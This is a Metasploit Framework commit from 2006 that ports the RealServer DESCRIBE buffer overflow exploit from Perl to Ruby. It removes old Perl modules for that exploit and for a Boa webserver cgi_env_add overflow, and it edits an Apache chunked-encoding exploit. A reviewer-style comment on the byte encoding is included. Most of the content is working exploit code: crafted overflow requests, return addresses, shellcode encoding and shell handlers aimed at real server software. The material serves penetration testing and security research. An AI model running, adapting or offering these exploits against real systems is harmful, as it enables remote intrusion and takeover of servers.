ported realserver describe exploit

git-svn-id: file:///home/svn/framework3/trunk@4018 4d416f70-5f16-0410-b530-b9f4589650da
Matt Miller 2006-10-11 09:18:01 +00:00
parent abf2e057c8
commit 7f981714a6
4 changed files with 83 additions and 456 deletions


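--- a/PATH_NOT_SHOWN_1
+++ /dev/null
@@ -1,256 +0,0 @@
-require 'msf/core'
-module Msf
-class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
-include Exploit::Remote::Tcp
-def initialize(info = {})
-super(update_info(info,
-'Name' => 'BOA cgi_env_add Overflow',
-'Description' => %q{
-This module exploits an undisclosed flaw in the Boa
-webserver. The latest release branch is not vulnerable to
-this flaw, however, there are a number of embedded devices
-that still use this vulnerable version, such as Axis
-webcams. This exploit is pretty unreliable due to the
-unpredictability of certain variables that influence the
-env_buffer's, such as PATH, hostname, and other such things.
-},
-'Author' => [ 'skape', 'thief <thief@hick.org>' ],
-'Version' => '$Revision$',
-'References' =>
-[
-],
-'Privileged' => false,
-'Payload' =>
-{
-'Space' => 140,
-'BadChars' => "\x00\x0a\x0d",
-'PrependEncoder' => "\x83\xec\x7f",
-},
-'Targets' =>
-[
-[
-'Automatic Targetting',
-{
-'Platform' => 'linux',
-'Ret' => 0x0,
-},
-],
-],
-'DisclosureDate' => '',
-'DefaultTarget' => 0))
-end
-def exploit
-connect
-handler
-disconnect
-end
-=begin
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-package Msf::Exploit::boa_cgi_env_add;
-use strict;
-use base "Msf::Exploit";
-use Pex::Text;
-my $advanced =
-{
-};
-my $info =
-{
-'Name' => 'BOA cgi_env_add Overflow',
-'Version' => '$Revision$',
-'Authors' =>
-[
-'skape <mmiller [at] hick.org>',
-'thief <thief [at] hick.org>'
-],
-'Description' =>
-Pex::Text::Freeform(qq{
-This module exploits an undisclosed flaw in the Boa webserver. The latest
-release branch is not vulnerable to this flaw, however, there are a number
-of embedded devices that still use this vulnerable version, such as Axis webcams.
-This exploit is pretty unreliable due to the unpredictability of certain variables
-that influence the env_buffer's, such as PATH, hostname, and other such things.
-}),
-'Arch' => [ 'x86' ],
-'OS' => [ 'linux' ],
-'Priv' => 0,
-'UserOpts' =>
-{
-'RHOST' => [ 1, 'ADDR', 'The target proxy server address' ],
-'RPORT' => [ 1, 'PORT', 'The target proxy server port' ],
-'CGI' => [ 1, 'DATA', 'The CGI path to use', '/cgi-bin/io/virtualinput.cgi' ],
-},
-'Payload' =>
-{
-'Space' => 140,
-'MaxNops' => 0,
-'BadChars' => "\x00\x0a\x0d",
-'Keys' => [ '+findsock' ],
-'PrependEncoder' => "\x83\xec\x7f", # sub $0x7f, %esp
-},
-'Refs' =>
-[
-# 0day!
-],
-'Targets' =>
-[
-[ 'Boa/0.92o (Linux)', 0xbffffc30, 0xbffffba0 ],
-[ 'Test', 0x41414141, 0x41414141 ],
-],
-'Keys' => [ 'boa' ],
-};
-sub new
-{
-my $class = shift;
-my $self;
-$self = $class->SUPER::new(
-{
-'Info' => $info,
-'Advanced' => $advanced,
-},
-@_);
-return $self;
-}
-sub Check
-{
-my $self = shift;
-my $code = "Safe";
-my $resp;
-my $s;
-$s = Msf::Socket::Tcp->new(
-'PeerAddr' => $self->GetVar('RHOST'),
-'PeerPort' => $self->GetVar('RPORT'),
-'LocalPort' => $self->GetVar('CPORT'),
-'SSL' => $self->GetVar('SSL'));
-if (not defined($s))
-{
-return $self->CheckCode('Connect');
-}
-$s->Send("HEAD / HTTP/1.0\r\n\r\n");
-while (defined($resp = $s->Recv(-1, 5)))
-{
-my @lines = split /\n/, $resp;
-foreach my $line (@lines)
-{
-my ($var, $val) = split /: /, $line;
-$val =~ s/\r//;
-$val =~ s/\n//;
-if ($var eq 'Server')
-{
-$code = "Appears" if ($val eq 'Boa/0.92o');
-}
-}
-last if ($resp =~ "\r\n\r\n" or length($resp) == 0);
-}
-$s->Close();
-if ($code eq 'Appears')
-{
-$self->PrintLine("[*] This host appears to be vulnerable.");
-}
-else
-{
-$self->PrintLine("[*] This host does not appear to be vulnerable.");
-}
-return $self->CheckCode($code);
-}
-sub Exploit
-{
-my $self = shift;
-my $targetIdx = $self->GetVar('TARGET');
-my $payload = $self->GetVar('EncodedPayload');
-my $shellcode = $payload->Payload;
-my $randomText = undef;
-my $request = undef;
-my $target = $self->Targets->[$targetIdx];
-my $chunk = undef;
-my $final = undef;
-my $null = $target->[2];
-my $ret = $target->[1];
-my $cgi = $self->GetVar('CGI');
-my $pad = undef;
-my $s = undef;
-$self->PrintLine('[*] Trying exploit target: ' . $target->[0]);
-# Build out the request
-$randomText = Pex::Text::AlphaNumText(2039);
-$pad = ($ret - $null - 0xb) - length($shellcode);
-$chunk = "A" x 1858 . pack("V", $null - 0x74f);
-$final = $self->MakeNops($pad) . $shellcode . pack("V", $ret - length($shellcode));
-$request =
-"GET $cgi HTTP/1.0\r\n" .
-"01: $randomText\r\n" .
-"02: $randomText\r\n" .
-"03: $randomText\r\n" .
-"04: $randomText\r\n" .
-"05: $randomText\r\n" .
-"06: $randomText\r\n" .
-"07: $randomText\r\n" .
-"08: $chunk\r\n" .
-"OWNED: $final\r\n" .
-"\r\n";
-# Connect
-$s = Msf::Socket::Tcp->new(
-'PeerAddr' => $self->GetVar('RHOST'),
-'PeerPort' => $self->GetVar('RPORT'),
-'LocalPort' => $self->GetVar('CPORT'),
-'SSL' => $self->GetVar('SSL'));
-if (not defined($s) or
-$s->IsError)
-{
-$self->PrintLine('Error creating socket: '.$s->GetError);
-return;
-}
-$s->Send($request);
-$self->Handler($s) if (defined($s));
-}
-1;
-=end
-end
-end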


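--- a/PATH_NOT_SHOWN_2
+++ /dev/null
@@ -1,195 +0,0 @@
-require 'msf/core'
-module Msf
-class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
-include Exploit::Remote::Tcp
-def initialize(info = {})
-super(update_info(info,
-'Name' => 'RealServer Describe Buffer Overflow',
-'Description' => %q{
-This module exploits a buffer overflow in RealServer 7/8/9
-and was based on Johnny Cyberpunk's THCrealbad exploit. This
-code should reliably exploit Linux, BSD, and Windows-based
-servers.
-},
-'Author' => [ 'hdm' ],
-'Version' => '$Revision$',
-'References' =>
-[
-[ 'OSVDB', '4468'],
-[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
-[ 'MIL', '51'],
-],
-'Privileged' => true,
-'Payload' =>
-{
-'Space' => 2000,
-'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d",
-},
-'Targets' =>
-[
-[
-'Automatic Targetting',
-{
-'Platform' => 'linux, bsd, win32',
-'Ret' => 0x0,
-},
-],
-],
-'DisclosureDate' => 'Dec 20 2002',
-'DefaultTarget' => 0))
-end
-def exploit
-connect
-handler
-disconnect
-end
-=begin
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-package Msf::Exploit::realserver_describe_linux;
-use base 'Msf::Exploit';
-use strict;
-use Pex::Text;
-my $advanced = { };
-my $info =
-{
-'Name' => 'RealServer Describe Buffer Overflow',
-'Version' => '$Revision$',
-'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
-'Arch' => [ 'x86' ],
-'OS' => [ 'linux', 'bsd', 'win32' ],
-'Priv' => 1,
-'UserOpts' =>
-{
-'RHOST' => [1, 'ADDR', 'The target address'],
-'RPORT' => [1, 'PORT', 'The RTSP port', 554],
-},
-'Payload' =>
-{
-'Space' => 2000,
-'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff :&?.=",
-'Keys' => ['+findsock'],
-},
-'Description' => Pex::Text::Freeform(qq{
-This module exploits a buffer overflow in RealServer 7/8/9 and was based
-on Johnny Cyberpunk's THCrealbad exploit. This code should reliably exploit
-Linux, BSD, and Windows-based servers.
-}),
-'Refs' =>
-[
-['OSVDB', '4468'],
-['URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
-['MIL', '51'],
-],
-'DefaultTarget' => 0,
-'Targets' => [['Universal Target']],
-'Keys' => ['realserver'],
-'DisclosureDate' => 'Dec 20 2002',
-};
-sub new {
-my $class = shift;
-my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-return($self);
-}
-sub Check {
-my $self = shift;
-my $target_host = $self->GetVar('RHOST');
-my $target_port = $self->GetVar('RPORT');
-my $s = Msf::Socket::Tcp->new
-(
-'PeerAddr' => $target_host,
-'PeerPort' => $target_port,
-'LocalPort' => $self->GetVar('CPORT'),
-'SSL' => $self->GetVar('SSL'),
-);
-if ($s->IsError) {
-$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-return $self->CheckCode('Connect');
-}
-$s->Send("OPTIONS / RTSP/1.0\r\n\r\n");
-my $res = $s->Recv(-1, 5);
-$s->Close();
-if ($res =~ m/^Server:([^\n]+)/sm)
-{
-my $svr = $1;
-$svr =~ s/(^\s+|\r|\s+$)//g;
-$self->PrintLine("[*] $svr");
-return $self->CheckCode('Detected');
-}
-return $self->CheckCode('Safe');
-}
-sub Exploit {
-my $self = shift;
-my $target_host = $self->GetVar('RHOST');
-my $target_port = $self->GetVar('RPORT');
-my $shellcode = $self->GetVar('EncodedPayload')->Payload;
-$self->PrintLine("[*] RealServer universal exploit launched against $target_host");
-$self->PrintLine("[*] Kill the master rmserver pid to prevent shell disconnect");
-my $encoded;
-foreach (split(//, $shellcode)){ $encoded .= sprintf("%%%.2x", ord($_)) }
-my $req = "DESCRIBE /". ("../" x 560) . "\xcc\xcc\x90\x90". $encoded. ".smi RTSP/1.0\r\n\r\n";
-my $s = Msf::Socket::Tcp->new
-(
-'PeerAddr' => $target_host,
-'PeerPort' => $target_port,
-'LocalPort' => $self->GetVar('CPORT'),
-'SSL' => $self->GetVar('SSL'),
-);
-if ($s->IsError) {
-$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-return;
-}
-$s->Send($req);
-$self->Handler($s);
-return;
-}
-1;
-=end
-end
-end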


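--- /dev/null
+++ b/PATH_NOT_SHOWN_3
@@ -0,0 +1,78 @@
+require 'msf/core'
+require 'msf/core/exploit/http'
+module Msf
+class Exploits::Multi::Realserver::Describe < Msf::Exploit::Remote
+include Exploit::Remote::HttpClient
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'RealServer Describe Buffer Overflow',
+'Description' => %q{
+This module exploits a buffer overflow in RealServer 7/8/9
+and was based on Johnny Cyberpunk's THCrealbad exploit. This
+code should reliably exploit Linux, BSD, and Windows-based
+servers.
+},
+'Author' => 'hdm',
+'Version' => '$Revision: 3110 $',
+'References' =>
+[
+[ 'OSVDB', '4468'],
+[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
+[ 'MIL', '51'],
+],
+'Privileged' => true,
+'Payload' =>
+{
+'Space' => 2000,
+'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d",
+},
+'Targets' =>
+[
+[
+'Universal',
+{
+'Platform' => [ 'linux', 'bsd', 'win' ]
+},
+],
+],
+'DisclosureDate' => 'Dec 20 2002',
+'DefaultTarget' => 0))
+end
+def check
+response = request(
+'method' => 'OPTIONS',
+'proto' => 'RTSP/1.0',
+'uri' => '/')
+if response and response['Server']
+print_status("Found RTSP: #{response['Server']}")
+return Exploit::CheckCode::Detected
+else
+return Exploit::CheckCode::Safe
+end
+end
+def exploit
+print_status("RealServer universal exploit launched against #{rhost}")
+print_status("Kill the master rmserver pid to prevent shell disconnect")
+encoded = payload.encoded.gsub(/./) { |char| "%%%.2x" % char[0] }
+request(
+'method' => 'DESCRIBE',
+'proto' => 'RTSP/1.0',
+'uri' => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi")
+handler
+end
+end
+end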
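Review bot: The percent-encoding in `exploit` (`payload.encoded.gsub(/./) { |char| "%%%.2x" % char[0] }`) is not a total byte-wise transform: Ruby's `.` does not match a newline without the `m` flag, so an 0x0a byte would pass through unescaped, and `char[0]` is an Integer only under Ruby 1.8's `String#[]` — on later Rubies it is a one-character String and the format raises ArgumentError. A byte-oriented form avoids both, `encoded = payload.encoded.unpack('C*').map { |b| "%%%.2x" % b }.join`. BadChars already excludes 0x0a and 0x0d, so the newline case is presumably latent today, but the helper should not depend on the encoder honouring that list. Separately, the return value of `request` in `exploit` is not examined before `handler` runs; the Perl version this replaces returned early on `$s->IsError`, and it is not visible here whether `HttpClient#request` raises or returns nil on a connection failure.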


@ -148,7 +148,7 @@ class Exploits::Windows::Http::ApacheChunkedEncoding < Msf::Exploit::Remote
end
def check
response = request(:uri => '/')
response = request('uri' => '/')
if response.nil?
print_status("No response to request")
@ -229,14 +229,14 @@ class Exploits::Windows::Http::ApacheChunkedEncoding < Msf::Exploit::Remote
# Build the request
request(
:uri => '/',
:headers =>
'uri' => '/',
'headers' =>
{
'Host' => "#{vhost}:#{rport}",
'Transfer-Encoding' => "CHUNKED"
},
:body => "FFFFFFF0 " + pattern,
:timeout => 2
'body' => "FFFFFFF0 " + pattern,
'timeout' => 2
)
# Check the handler